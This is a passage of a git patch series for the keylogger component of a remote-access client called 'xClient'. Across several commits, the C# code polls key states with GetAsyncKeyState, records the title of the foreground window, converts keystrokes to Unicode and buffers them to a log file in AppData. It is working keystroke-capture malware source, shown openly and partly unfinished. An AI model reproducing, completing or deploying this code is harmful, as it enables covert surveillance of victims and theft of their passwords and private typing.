need to translate + // the data to virtual code, then to unicode character, then we can log to + // the file. + [DllImport("user32.dll")] + internal static extern short GetAsyncKeyState(int vKey); + + [DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)] + internal static extern int GetWindowText(int hWnd, StringBuilder lpString, int nMaxCount); + + [DllImport("user32.dll", CharSet = CharSet.Unicode, ExactSpelling = true)] + internal static extern int ToUnicodeEx(int wVirtKey, uint wScanCode, byte[] lpKeyState, StringBuilder pwszBuff, + int cchBuff, uint wFlags, IntPtr dwhkl); + + [DllImport("user32.dll")] + internal static extern IntPtr GetForegroundWindow(); + + [DllImport("user32.dll")] + internal static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId); + + [DllImport("user32.dll", ExactSpelling = true)] + internal static extern IntPtr GetKeyboardLayout(uint threadId); + } +} \ No newline at end of file From 030805dba8ca0ce08ff65285945dd33815297222 Mon Sep 17 00:00:00 2001 From: yankejustin Date: Fri, 8 May 2015 16:51:14 -0400 Subject: [PATCH 05/20] Documentation for properties of Keylogger Keys Added documentation for the two properties of the Keylogger. --- Client/Core/Keylogger/KeyloggerAttributes.cs | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/Client/Core/Keylogger/KeyloggerAttributes.cs b/Client/Core/Keylogger/KeyloggerAttributes.cs index d3dd435d..ca030e5e 100644 --- a/Client/Core/Keylogger/KeyloggerAttributes.cs +++ b/Client/Core/Keylogger/KeyloggerAttributes.cs @@ -7,7 +7,15 @@ namespace xClient.Core.Keylogger [AttributeUsage(AttributeTargets.Enum, AllowMultiple = false)] public class KeyloggerKey : Attribute { + /// + /// The appearance of the logged key. + /// public string KeyName { get; private set; } + /// + /// Tells the Logger that this key is handled in a special way. + /// + // Please note that "Special Keys" will be colored in a different + // way by the Logger. public bool IsSpecialKey { get; private set; } /// From dbc3cbe7a24859cdaaf8fc09ddb7d7eb1d5b1a04 Mon Sep 17 00:00:00 2001 From: yankejustin Date: Fri, 8 May 2015 20:42:03 -0400 Subject: [PATCH 06/20] Fixed AttributeTarget AttributeTarget can now correctly apply to Keylogger Keys. --- Client/Core/Keylogger/KeyloggerAttributes.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Client/Core/Keylogger/KeyloggerAttributes.cs b/Client/Core/Keylogger/KeyloggerAttributes.cs index ca030e5e..ad4f123b 100644 --- a/Client/Core/Keylogger/KeyloggerAttributes.cs +++ b/Client/Core/Keylogger/KeyloggerAttributes.cs @@ -4,7 +4,7 @@ using System.Text; namespace xClient.Core.Keylogger { - [AttributeUsage(AttributeTargets.Enum, AllowMultiple = false)] + [AttributeUsage(AttributeTargets.Field, AllowMultiple = false)] public class KeyloggerKey : Attribute { /// From 9993a4b21cf10490d81e4e6c42b0411fb1a9b258 Mon Sep 17 00:00:00 2001 From: yankejustin Date: Fri, 8 May 2015 23:48:48 -0400 Subject: [PATCH 07/20] Last of the big changes to the Keylogger Added the second and likely last of the big changes and additions to the Keylogger. The core design of it is much more clear than the initial changes commit. Though not yet functional (last of it has to be implemented, as seen by the small commented-out portions), it is nearing completion. With this new design, it is significantly more scalable. With these changes also comes another huge factor: modifications. This new system allows easy feature additions and modifications, such as filtering out specific keys to log dynamically in a natural manner. --- Client/Core/Keylogger/KeyloggerAttributes.cs | 5 + Client/Core/Keylogger/KeyloggerHelpers.cs | 73 +++++- Client/Core/Keylogger/KeyloggerKeys.cs | 94 +++++-- Client/Core/Keylogger/Logger.cs | 251 +++++++------------ Client/Core/Keylogger/Win32.cs | 5 +- 5 files changed, 243 insertions(+), 185 deletions(-) diff --git a/Client/Core/Keylogger/KeyloggerAttributes.cs b/Client/Core/Keylogger/KeyloggerAttributes.cs index ad4f123b..71afa841 100644 --- a/Client/Core/Keylogger/KeyloggerAttributes.cs +++ b/Client/Core/Keylogger/KeyloggerAttributes.cs @@ -4,6 +4,11 @@ using System.Text; namespace xClient.Core.Keylogger { + /// + /// An attribute that defines a field to be that of a basic Keylogger + /// key. This attribute is used to represent the key in a better way + /// by holding specific data of the key it defines. + /// [AttributeUsage(AttributeTargets.Field, AllowMultiple = false)] public class KeyloggerKey : Attribute { diff --git a/Client/Core/Keylogger/KeyloggerHelpers.cs b/Client/Core/Keylogger/KeyloggerHelpers.cs index ea381659..b5d830dd 100644 --- a/Client/Core/Keylogger/KeyloggerHelpers.cs +++ b/Client/Core/Keylogger/KeyloggerHelpers.cs @@ -3,14 +3,85 @@ using System.Collections.Generic; using System.Text; using System.Reflection; using xClient.Core.Keylogger; +using System.Runtime.CompilerServices; namespace xClient.Core.Keylogger { + /// + /// Provides extension methods that are used to assist repetitive tasks that + /// are done throughout the keylogging system. + /// public static class KeyloggerHelpers { - public static byte GetKeyloggerKeyValue(this Enum sender) where T : KeyloggerKey + /// + /// Extracts the byte representation of the specific key provided. + /// + /// The keylogger key to obtain the byte data from. + /// Returns the byte representation of the key provided. + public static byte GetKeyloggerKeyValue(this KeyloggerKeys sender) { return Convert.ToByte(sender); } + + /// + /// Determines if the key provided is one that is considered to be + /// special and should be handled differently by the keylogger. + /// + /// The keylogger key to decide upon. + /// True if the key is special; False if the key is not special. + public static bool IsSpecialKey(this KeyloggerKeys sender) + { + try + { + KeyloggerKey keyInformation = ((KeyloggerKey)sender.GetType().GetCustomAttributes(typeof(KeyloggerKeys), false)[0]); + + return keyInformation.IsSpecialKey; + } + catch (TypeLoadException) + { + // The likely cause of this exception would be a lack of an attribute for the Keylogger Key. + return false; + } + } + + /// + /// Obtains the name, if one was given, of the key provided. + /// + /// The keylogger key to obtain the name from. + /// Returns the name of the key that was explicitly provided. + public static string KeyloggerKeyName(this KeyloggerKeys sender) + { + try + { + KeyloggerKey keyInformation = ((KeyloggerKey)sender.GetType().GetCustomAttributes(typeof(KeyloggerKeys), false)[0]); + + return keyInformation.KeyName; + } + catch (TypeLoadException) + { + // The likely cause of this exception would be a lack of an attribute for the Keylogger Key. + return string.Empty; + } + } + + /// + /// Determines if the key code provided is in the pressed state. + /// + /// The code for the key. + /// True if key is pressed; False if the key is not. + public static bool IsKeyPressed(this short sender) + { + return Convert.ToBoolean(sender & 0x8000); + } + + /// + /// Determines if the key code provided is in a toggled state. + /// + /// The code for the key. + /// True if toggled on; False if toggled off. + public static bool IsKeyToggled(this short sender) + { + return ((sender & 0xffff) != 0); + } } } \ No newline at end of file diff --git a/Client/Core/Keylogger/KeyloggerKeys.cs b/Client/Core/Keylogger/KeyloggerKeys.cs index fc791588..77df04ee 100644 --- a/Client/Core/Keylogger/KeyloggerKeys.cs +++ b/Client/Core/Keylogger/KeyloggerKeys.cs @@ -11,6 +11,46 @@ using System.Text; namespace xClient.Core.Keylogger { + /// + /// The main object that stores both the pressed key at a specific time + /// and the modifier keys that go along with the pressed key. + /// + public class LoggedKey + { + /// + /// A data type that is used for storing values regarding the states of + /// modifier keys at a given time. + /// + public struct KeyloggerModifierKeys + { + public bool ShiftKeyPressed { get; set; } + public bool AltKeyPressed { get; set; } + public bool CtrlKeyPressed { get; set; } + + public bool CapsLock { get; set; } + public bool NumLock { get; set; } + public bool ScrollLock { get; set; } + } + + public KeyloggerKeys PressedKey { get; set; } + public KeyloggerModifierKeys ModifierKeys { get; private set; } + + public void RecordModifierKeys() + { + ModifierKeys = new KeyloggerModifierKeys() + { + // Modifier keys that are pressed: + CtrlKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_CONTROL).IsKeyPressed(), + AltKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_MENU).IsKeyPressed(), + ShiftKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SHIFT).IsKeyPressed(), + // Modifier keys that have a state (toggle 'on' or 'off'). + CapsLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_CAPITAL).IsKeyToggled(), + NumLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_NUMLOCK).IsKeyToggled(), + ScrollLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SCROLL).IsKeyToggled() + }; + } + } + /// /// Contains various keys that the keylogger supports. /// @@ -51,163 +91,163 @@ namespace xClient.Core.Keylogger /// /// Control-break processing. /// - [KeyloggerKey("[CANCEL]", true)] + [KeyloggerKey("CANCEL", true)] VK_CANCEL = 0x03, /// /// BACKSPACE key. /// - [KeyloggerKey("[BACKSPACE]", true)] + [KeyloggerKey("BACKSPACE", true)] VK_BACK = 0x08, /// /// TAB key. /// - [KeyloggerKey("[TAB]", true)] + [KeyloggerKey("TAB", true)] VK_TAB = 0x09, /// /// CLEAR key. /// - [KeyloggerKey("[CLEAR]", true)] + [KeyloggerKey("CLEAR", true)] VK_CLEAR = 0x0C, /// /// ENTER key. /// - [KeyloggerKey("[ENTER]", true)] + [KeyloggerKey("ENTER", true)] VK_RETURN = 0x0D, /// /// SHIFT key. /// - [KeyloggerKey("[SHIFT]", true)] + [KeyloggerKey("SHIFT", true)] VK_SHIFT = 0x10, /// /// CONTROL (CTRL) key. /// - [KeyloggerKey("[CTRL]", true)] + [KeyloggerKey("CTRL", true)] VK_CONTROL = 0x11, /// /// ALT key. /// - [KeyloggerKey("[ALT]", true)] + [KeyloggerKey("ALT", true)] VK_MENU = 0x12, /// /// PAUSE key. /// - [KeyloggerKey("[PAUSE]", true)] + [KeyloggerKey("PAUSE", true)] VK_PAUSE = 0x13, /// /// CAPS LOCK key. /// - [KeyloggerKey("[CAPS]", true)] + [KeyloggerKey("CAPS", true)] VK_CAPITAL = 0x14, /// /// ESC key. /// - [KeyloggerKey("[ESC]", true)] + [KeyloggerKey("ESC", true)] VK_ESCAPE = 0x1B, /// /// SPACEBAR key. /// - [KeyloggerKey("[SPACE]", true)] + [KeyloggerKey("SPACE", true)] VK_SPACE = 0x20, /// /// PAGE UP key. /// - [KeyloggerKey("[PAGE_UP]", true)] + [KeyloggerKey("[PAGE_UP", true)] VK_PRIOR = 0x21, /// /// PAGE DOWN key. /// - [KeyloggerKey("[PAGE_DOWN]", true)] + [KeyloggerKey("PAGE_DOWN", true)] VK_NEXT = 0x22, /// /// END key. /// - [KeyloggerKey("[END]", true)] + [KeyloggerKey("END", true)] VK_END = 0x23, /// /// HOME key. /// - [KeyloggerKey("[HOME]", true)] + [KeyloggerKey("HOME", true)] VK_HOME = 0x24, /// /// LEFT ARROW key. /// - [KeyloggerKey("[ARROW_LEFT]", true)] + [KeyloggerKey("ARROW_LEFT", true)] VK_LEFT = 0x25, /// /// UP ARROW key. /// - [KeyloggerKey("[ARROW_DOWN]", true)] + [KeyloggerKey("ARROW_DOWN", true)] VK_UP = 0x26, /// /// RIGHT ARROW key. /// - [KeyloggerKey("[ARROW_RIGHT]", true)] + [KeyloggerKey("ARROW_RIGHT", true)] VK_RIGHT = 0x27, /// /// DOWN ARROW key. /// - [KeyloggerKey("[ARROW_DOWN]", true)] + [KeyloggerKey("ARROW_DOWN", true)] VK_DOWN = 0x28, /// /// SELECT key. /// - [KeyloggerKey("[SELECT]", true)] + [KeyloggerKey("SELECT", true)] VK_SELECT = 0x29, /// /// PRINT key. /// - [KeyloggerKey("[PRINT]", true)] + [KeyloggerKey("PRINT", true)] VK_PRINT = 0x2A, /// /// EXECUTE key. /// - [KeyloggerKey("[EXECUTE]", true)] + [KeyloggerKey("EXECUTE", true)] VK_EXECUTE = 0x2B, /// /// PRINT SCREEN key. /// - [KeyloggerKey("[PRINT_SCREEN]", true)] + [KeyloggerKey("PRINT_SCREEN", true)] VK_SNAPSHOT = 0x2C, /// /// INSERT (INS) key. /// - [KeyloggerKey("[INSERT]", true)] + [KeyloggerKey("INSERT", true)] VK_INSERT = 0x2D, /// /// DELETE (DEL) key. /// - [KeyloggerKey("[DEL]", true)] + [KeyloggerKey("DEL", true)] VK_DELETE = 0x2E, /// /// HELP key. /// - [KeyloggerKey("[HELP]", true)] + [KeyloggerKey("HELP", true)] VK_HELP = 0x2F, #endregion diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index 6a8af617..f876f4cc 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -9,11 +9,6 @@ using xClient.Core.Keylogger; namespace xClient.Core.Keylogger { - public struct LoggedKey - { - public KeyloggerKeys PressedChar { get; set; } - } - public class Logger { public static Logger Instance; @@ -27,46 +22,6 @@ namespace xClient.Core.Keylogger } } - private static bool ShiftKey - { - get - { - return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.ShiftKey) & 0x8000); //Returns true if shiftkey is pressed - } - } - - private static bool ControlKey - { - get - { - return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.ControlKey) & 0x8000); //Returns true if controlkey is pressed - } - } - - private static bool AltKey - { - get - { - return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.Menu) & 0x8000); //Returns true if altkey is pressed - } - } - - private static bool CapsLock - { - get - { - return Control.IsKeyLocked(Keys.CapsLock); //Returns true if Capslock is toggled on - } - } - - private static bool EscapeKey - { - get - { - return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.Escape) & 0x8000); //Returns true if Escape is pressed - } - } - private StringBuilder _logFileBuffer; private string _hWndTitle; private string _hWndLastTitle; @@ -74,7 +29,8 @@ namespace xClient.Core.Keylogger private readonly string _filePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Logs\\"; - private readonly List _enumValues; + private readonly KeyloggerKeys[] _allKeys; + private readonly KeyloggerKeys[] _specialKeys; private volatile List _keyBuffer; private readonly System.Timers.Timer _timerLogKeys; private readonly System.Timers.Timer _timerEmptyKeyBuffer; @@ -91,56 +47,80 @@ namespace xClient.Core.Keylogger WriteFile(); + _allKeys = GetKeyloggerKeys(); + _specialKeys = GetSpecialKeys(); + _keyBuffer = new List(); - _enumValues = new List() - //Populate enumValues list with the Virtual Key Codes of the keys we want to log - { - 8, //Backspace - 9, //Tab - 13, //Enter - 32, //Space - 46, //Delete - }; - - for (short i = 48; i <= 57; i++) //0-9 regular - { - _enumValues.Add(i); - } - - for (short i = 65; i <= 122; i++) - //65-90 A-Z - //91-92 LWin + RWin key - //skip 93-94 Applications and sleep key - //95-111 numpad keys, 112-122 F1-F11 keys - { - if (i >= 93 && i <= 94) continue; - _enumValues.Add(i); - } - - for (short i = 186; i <= 192; i++) - //186 VK_OEM_1, 187 VK_OEM_PLUS, 188 VK_OEM_COMMA, 189 VK_OEM_MINUS, 190 VK_OEM_PERIOD, 191 VK_OEM_2, 192 VK_OEM_3 - { - _enumValues.Add(i); - } - - for (short i = 219; i <= 222; i++) //219 VK_OEM_4, 220 VK_OEM_5, 221 VK_OEM_6, 222 VK_OEM_7 - { - _enumValues.Add(i); - } - - this._timerLogKeys = new System.Timers.Timer {Enabled = false, Interval = 10}; + this._timerLogKeys = new System.Timers.Timer { Enabled = false, Interval = 10 }; this._timerLogKeys.Elapsed += this.timerLogKeys_Elapsed; this._timerEmptyKeyBuffer = new System.Timers.Timer { Enabled = false, Interval = 500 }; this._timerEmptyKeyBuffer.Elapsed += this.timerEmptyKeyBuffer_Elapsed; - this._timerFlush = new System.Timers.Timer {Enabled = false, Interval = flushInterval}; + this._timerFlush = new System.Timers.Timer { Enabled = false, Interval = flushInterval }; this._timerFlush.Elapsed += this.timerFlush_Elapsed; this._logFileBuffer = new StringBuilder(); } + /// + /// Retrieves an array of all keylogger keys that are special. + /// + /// + private static KeyloggerKeys[] GetSpecialKeys() + { + List SpecialKeys = new List(); + + try + { + foreach (KeyloggerKeys key in Enum.GetValues(typeof(KeyloggerKeys))) + { + try + { + if (key.IsSpecialKey()) + { + SpecialKeys.Add(key); + } + } + catch + { } + } + } + catch + { } + + return SpecialKeys.ToArray(); + } + + /// + /// Retrieves an array of all keylogger keys that are supported. + /// + /// + private static KeyloggerKeys[] GetKeyloggerKeys() + { + List NormalKeys = new List(); + + try + { + foreach (KeyloggerKeys key in Enum.GetValues(typeof(KeyloggerKeys))) + { + try + { + NormalKeys.Add(key); + } + catch + { } + } + + return NormalKeys.ToArray(); + } + catch + { + return new KeyloggerKeys[0]; + } + } + private string HighlightSpecialKey(string name) { return string.Format("[{0}]", name); @@ -149,79 +129,36 @@ namespace xClient.Core.Keylogger private void timerEmptyKeyBuffer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { int j = 0; - LoggedKey[] keybuffer = new LoggedKey[_keyBuffer.Count]; - _keyBuffer.CopyTo(keybuffer); - foreach (var k in keybuffer) - { - if (k.PressedChar != null) - { - // TODO: RE-WRITE THE WAY IT IS PARSED. - //switch (k.PressedChar) - //{ - // case 8: - // _logFileBuffer.Append(HighlightSpecialKey("Back")); - // break; - // case 9: - // _logFileBuffer.Append(HighlightSpecialKey("Tab")); - // break; - // case 13: - // _logFileBuffer.Append(HighlightSpecialKey("Enter")); - // break; - // case 32: - // _logFileBuffer.Append(" "); - // break; - // case 46: - // _logFileBuffer.Append(HighlightSpecialKey("Del")); - // break; - // case 91: - // case 92: - // _logFileBuffer.Append(HighlightSpecialKey("Win")); - // break; - // case 112: - // case 113: - // case 114: - // case 115: - // case 116: - // case 117: - // case 118: - // case 119: - // case 120: - // case 121: - // case 122: - // _logFileBuffer.Append(HighlightSpecialKey("F" + (k.Value - 111))); - // break; - // default: - // if (_enumValues.Contains(k.Value)) - // { - // if (k.ShiftKey || k.ControlKey || k.AltKey || k.EscapeKey) - // { - // _logFileBuffer.Append( - // HighlightSpecialKey( - // ((k.ShiftKey) ? "SHIFT-" : string.Empty) + - // ((k.ControlKey) ? "CTRL-" : string.Empty) + - // ((k.AltKey) ? "ALT-" : string.Empty) + - // ((k.EscapeKey) ? "ESC-" : string.Empty) + - // FromKeys(k.Value, k.ShiftKey, k.CapsLock) - // )); - // } - // else - // { - // _logFileBuffer.Append(FromKeys(k.Value, k.ShiftKey, k.CapsLock)); - // } - // } - // break; - //} + foreach (var k in _keyBuffer) + { + if (k.PressedKey != null) + { + if (k.PressedKey.IsSpecialKey()) + { + // TODO: Re-Write this portion with the portion for when the timer elapses. + + //_logFileBuffer.Append( + // HighlightSpecialKey(((k.ModifierKeys.ShiftKeyPressed) ? "SHIFT-" : string.Empty) + + // ((k.ModifierKeys.CtrlKeyPressed) ? "CTRL-" : string.Empty) + + // ((k.ModifierKeys.AltKeyPressed) ? "ALT-" : string.Empty) + + // ((k.ModifierKeys.ShiftKeyPressed) ? "ESC-" : string.Empty) + + // FromKeys(k.PressedKey.KeyloggerKeyName(), k.ModifierKeys.ShiftKeyPressed, k.ModifierKeys.CapsLock))); + } + } + else + { + _logFileBuffer.Append(FromKeys(k.PressedKey.GetKeyloggerKeyValue(), k.ModifierKeys.ShiftKeyPressed, k.ModifierKeys.CapsLock)); } - j++; } + j++; if (j > 0 && j <= _keyBuffer.Count) _keyBuffer.RemoveRange(0, j); } private void timerLogKeys_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { - foreach (short i in _enumValues) //Loop through our enumValues list populated with the keys we want to log + foreach (short i in _allKeys) //Loop through our enumValues list populated with the keys we want to log { if (Win32.GetAsyncKeyState(i) == -32767) //GetAsycKeyState returns -32767 to indicate keypress { @@ -309,27 +246,29 @@ namespace xClient.Core.Keylogger private IntPtr GetActiveKeyboardLayout() { uint pid; + //Get the appropriate unicode character from the state of keyboard and from the Keyboard layout (language) of the active thread return Win32.GetKeyboardLayout(Win32.GetWindowThreadProcessId(Win32.GetForegroundWindow(), out pid)); } private char? FromKeys(int keys, bool shift, bool caps) { - var keyStates = new byte[256]; - //keyStates is a byte array that specifies the current state of the keyboard and keys + //keyStates is a byte array that specifies the current state of the keyboard and keys //The keys we are interested in are modifier keys such as shift and caps lock + var keyStates = new byte[256]; + if (shift) + //keyStates[16] tells our ToUnicodeEx method the state of the shift key which is 0x80 (Key pressed down) keyStates[16] = 0x80; - //keyStates[16] tells our ToUnicodeEx method the state of the shift key which is 0x80 (Key pressed down) + if (caps) + //keyStates[20] tells our ToUnicodeEx method the state of the Capslock key which is 0x01 (Key toggled on) keyStates[20] = 0x01; - //keyStates[20] tells our ToUnicodeEx method the state of the Capslock key which is 0x01 (Key toggled on) var sb = new StringBuilder(10); return Win32.ToUnicodeEx(keys, 0, keyStates, sb, sb.Capacity, 0, GetActiveKeyboardLayout()) == 1 - ? (char?) sb[0] - : null; - //Get the appropriate unicode character from the state of keyboard and from the Keyboard layout (language) of the active thread + ? (char?)sb[0] + : null; } } -} +} \ No newline at end of file diff --git a/Client/Core/Keylogger/Win32.cs b/Client/Core/Keylogger/Win32.cs index 93da5a9d..d1a322a2 100644 --- a/Client/Core/Keylogger/Win32.cs +++ b/Client/Core/Keylogger/Win32.cs @@ -8,6 +8,9 @@ using System.Windows.Forms; namespace xClient.Core.Keylogger { + /// + /// Provides calls to Native code for functions in the keylogger. + /// public static class Win32 { /// @@ -23,7 +26,7 @@ namespace xClient.Core.Keylogger internal static extern int MapVirtualKeyExW(int uCode, int uMapType, IntPtr dwhkl); [DllImport("user32.dll")] - internal static extern short GetAsyncKeyState(Keys vKey); + internal static extern short GetAsyncKeyState(KeyloggerKeys vKey); // The value passed to GetAsyncKeyState is scan code, so we need to translate // the data to virtual code, then to unicode character, then we can log to From 601c6a84f77ef34b61b1dc6e33dd1f8c5d7c8e28 Mon Sep 17 00:00:00 2001 From: yankejustin Date: Fri, 8 May 2015 23:55:24 -0400 Subject: [PATCH 08/20] Fix: Added support for Extension Methods Made a small attribute to support the power and beauty of extension methods in .NET 2.0! :) --- Client/Program.cs | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/Client/Program.cs b/Client/Program.cs index a82777ea..7794adaa 100644 --- a/Client/Program.cs +++ b/Client/Program.cs @@ -8,6 +8,15 @@ using xClient.Core.Commands; using xClient.Core.Keylogger; using xClient.Core.Packets; +namespace System.Runtime.CompilerServices +{ + // With this namespace defined along with this attribute stub, we now + // have access to the power of extension methods for the whole client! + // :) + [AttributeUsage(AttributeTargets.Assembly | AttributeTargets.Class | AttributeTargets.Method)] + public sealed class ExtensionAttribute : Attribute { } +} + namespace xClient { internal static class Program From 0ec142183ebda72c6d66960b5d6221cb4209de87 Mon Sep 17 00:00:00 2001 From: yankejustin Date: Sat, 9 May 2015 00:04:16 -0400 Subject: [PATCH 09/20] Fixed a conditional and renamed a method Fixed null check for the stored key loop in the key buffer and renamed a method so it is more clear. --- Client/Core/Keylogger/KeyloggerHelpers.cs | 2 +- Client/Core/Keylogger/Logger.cs | 3 ++- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/Client/Core/Keylogger/KeyloggerHelpers.cs b/Client/Core/Keylogger/KeyloggerHelpers.cs index b5d830dd..34ee38d7 100644 --- a/Client/Core/Keylogger/KeyloggerHelpers.cs +++ b/Client/Core/Keylogger/KeyloggerHelpers.cs @@ -49,7 +49,7 @@ namespace xClient.Core.Keylogger /// /// The keylogger key to obtain the name from. /// Returns the name of the key that was explicitly provided. - public static string KeyloggerKeyName(this KeyloggerKeys sender) + public static string GetKeyloggerKeyName(this KeyloggerKeys sender) { try { diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index f876f4cc..2bf1efa8 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -132,7 +132,8 @@ namespace xClient.Core.Keylogger foreach (var k in _keyBuffer) { - if (k.PressedKey != null) + // + if (k != null && !string.IsNullOrEmpty(k.PressedKey.GetKeyloggerKeyName())) { if (k.PressedKey.IsSpecialKey()) { From 31678d5175f1003ab093969a55320b6e1b04a131 Mon Sep 17 00:00:00 2001 From: d3agle Date: Sat, 9 May 2015 03:26:47 -0500 Subject: [PATCH 10/20] Added attributes Very nice work. This looks very nice. --- Client/Core/Keylogger/KeyloggerKeys.cs | 77 +++++++++++++++++++++++++- 1 file changed, 74 insertions(+), 3 deletions(-) diff --git a/Client/Core/Keylogger/KeyloggerKeys.cs b/Client/Core/Keylogger/KeyloggerKeys.cs index 77df04ee..83a2b672 100644 --- a/Client/Core/Keylogger/KeyloggerKeys.cs +++ b/Client/Core/Keylogger/KeyloggerKeys.cs @@ -163,7 +163,7 @@ namespace xClient.Core.Keylogger /// /// PAGE UP key. /// - [KeyloggerKey("[PAGE_UP", true)] + [KeyloggerKey("PAGE_UP", true)] VK_PRIOR = 0x21, /// @@ -357,101 +357,121 @@ namespace xClient.Core.Keylogger /// /// 'G' key. /// + [KeyloggerKey("g")] K_G = 0x47, /// /// 'H' key. /// + [KeyloggerKey("h")] K_H = 0x48, /// /// 'I' key. /// + [KeyloggerKey("i")] K_I = 0x49, /// /// 'J' key. /// + [KeyloggerKey("j")] K_J = 0x4A, /// /// 'K' key. /// + [KeyloggerKey("k")] K_K = 0x4B, /// /// 'L' key. /// + [KeyloggerKey("l")] K_L = 0x4C, /// /// 'M' key. /// + [KeyloggerKey("m")] K_M = 0x4D, /// /// 'N' key. /// + [KeyloggerKey("n")] K_N = 0x4E, /// /// 'O' key. /// + [KeyloggerKey("o")] K_O = 0x4F, /// /// 'P' key. /// + [KeyloggerKey("p")] K_P = 0x50, /// /// 'Q' key. /// + [KeyloggerKey("q")] K_Q = 0x51, /// /// 'R' key. /// + [KeyloggerKey("r")] K_R = 0x52, /// /// 'S' key. /// + [KeyloggerKey("s")] K_S = 0x53, /// /// 'T' key. /// + [KeyloggerKey("t")] K_T = 0x54, /// /// 'U' key. /// + [KeyloggerKey("u")] K_U = 0x55, /// /// 'V' key. /// + [KeyloggerKey("v")] K_V = 0x56, /// /// 'W' key. /// + [KeyloggerKey("w")] K_W = 0x57, /// /// 'X' key. /// + [KeyloggerKey("x")] K_X = 0x58, /// /// 'Y' key. /// + [KeyloggerKey("y")] K_Y = 0x59, /// /// 'Z' key. /// + [KeyloggerKey("z")] K_Z = 0x5A, #endregion @@ -461,21 +481,25 @@ namespace xClient.Core.Keylogger /// /// Left Windows key (Natural keyboard). /// + [KeyloggerKey("LWIN")] VK_LWIN = 0x5B, /// /// Right Windows key (Natural keyboard). /// + [KeyloggerKey("RWIN")] VK_RWIN = 0x5C, /// /// Applications key (natural keyboard). /// + [KeyloggerKey("APPS")] VK_APPS = 0x5D, /// /// Computer Sleep key. /// + [KeyloggerKey("SLEEP")] VK_SLEEP = 0x5F, #endregion @@ -485,51 +509,61 @@ namespace xClient.Core.Keylogger /// /// Numeric keypad 0 key. /// + [KeyloggerKey("0")] VK_NUMPAD0 = 0x60, /// /// Numeric keypad 1 key. /// + [KeyloggerKey("1")] VK_NUMPAD1 = 0x61, /// /// Numeric keypad 2 key. /// + [KeyloggerKey("2")] VK_NUMPAD2 = 0x62, /// /// Numeric keypad 3 key. /// + [KeyloggerKey("3")] VK_NUMPAD3 = 0x63, /// /// Numeric keypad 4 key. /// + [KeyloggerKey("4")] VK_NUMPAD4 = 0x64, /// /// Numeric keypad 5 key. /// + [KeyloggerKey("5")] VK_NUMPAD5 = 0x65, /// /// Numeric keypad 6 key. /// + [KeyloggerKey("6")] VK_NUMPAD6 = 0x66, /// /// Numeric keypad 7 key. /// + [KeyloggerKey("7")] VK_NUMPAD7 = 0x67, /// /// Numeric keypad 8 key. /// + [KeyloggerKey("8")] VK_NUMPAD8 = 0x68, /// - /// Numeric keypad 0 key. - /// 9 + /// Numeric keypad 9 key. + /// + [KeyloggerKey("9")] VK_NUMPAD9 = 0x69, #endregion @@ -539,11 +573,13 @@ namespace xClient.Core.Keylogger /// /// Multiply key. /// + [KeyloggerKey("*")] VK_MULTIPLY = 0x6A, /// /// Add key. /// + [KeyloggerKey("+")] VK_ADD = 0x6B, /// @@ -554,16 +590,19 @@ namespace xClient.Core.Keylogger /// /// Subtract (-) key. /// + [KeyloggerKey("-")] VK_SUBTRACT = 0x6D, /// /// Decimal (.) key. /// + [KeyloggerKey(".")] VK_DECIMAL = 0x6E, /// /// Divide (/) key. /// + [KeyloggerKey("/")] VK_DIVIDE = 0x6F, #endregion @@ -573,121 +612,145 @@ namespace xClient.Core.Keylogger /// /// F1 key. /// + [KeyloggerKey("F1")] VK_F1 = 0x70, /// /// F2 key. /// + [KeyloggerKey("F2")] VK_F2 = 0x71, /// /// F3 key. /// + [KeyloggerKey("F3")] VK_F3 = 0x72, /// /// F4 key. /// + [KeyloggerKey("F4")] VK_F4 = 0x73, /// /// F5 key. /// + [KeyloggerKey("F5")] VK_F5 = 0x74, /// /// F6 key. /// + [KeyloggerKey("F6")] VK_F6 = 0x75, /// /// F7 key. /// + [KeyloggerKey("F7")] VK_F7 = 0x76, /// /// F8 key. /// + [KeyloggerKey("F8")] VK_F8 = 0x77, /// /// F9 key. /// + [KeyloggerKey("F9")] VK_F9 = 0x78, /// /// F10 key. /// + [KeyloggerKey("F10")] VK_F10 = 0x79, /// /// F11 key. /// + [KeyloggerKey("F11")] VK_F11 = 0x7A, /// /// F12 key. /// + [KeyloggerKey("F12")] VK_F12 = 0x7B, /// /// F13 key. /// + [KeyloggerKey("F13")] VK_F13 = 0x7C, /// /// F14 key. /// + [KeyloggerKey("F14")] VK_F14 = 0x7D, /// /// F15 key. /// + [KeyloggerKey("F15")] VK_F15 = 0x7E, /// /// F16 key. /// + [KeyloggerKey("F16")] VK_F16 = 0x7F, /// /// F17 key. /// + [KeyloggerKey("F17")] VK_F17 = 0x80, /// /// F18 key. /// + [KeyloggerKey("F18")] VK_F18 = 0x81, /// /// F19 key. /// + [KeyloggerKey("F19")] VK_F19 = 0x82, /// /// F20 key. /// + [KeyloggerKey("F20")] VK_F20 = 0x83, /// /// F21 key. /// + [KeyloggerKey("F21")] VK_F21 = 0x84, /// /// F22 key. /// + [KeyloggerKey("F22")] VK_F22 = 0x85, /// /// F23 key. /// + [KeyloggerKey("F23")] VK_F23 = 0x86, /// /// F24 key. /// + [KeyloggerKey("F24")] 